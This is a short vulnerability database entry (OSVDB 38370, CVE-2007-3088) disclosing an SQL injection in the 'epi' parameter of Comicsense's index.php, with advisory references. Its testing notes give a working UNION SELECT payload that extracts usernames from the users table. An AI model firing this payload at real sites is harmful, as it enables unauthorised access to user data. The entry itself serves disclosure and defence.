Comicsense index.php epi Variable SQL Injection

2007-06-05T00:00:00
ID OSVDB:38370
Type osvdb
Reporter OSVDB
Modified 2007-06-05T00:00:00

Description

Manual Testing Notes

http://[target]/comic_paht/index.php?epi=-1 UNION SELECT username,1,1 FROM users

References:

Other Advisory URL: http://securityreason.com/securityalert/2778 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-06/0064.html ISS X-Force ID: 34736 FrSIRT Advisory: ADV-2007-2092 CVE-2007-3088 Bugtraq ID: 24329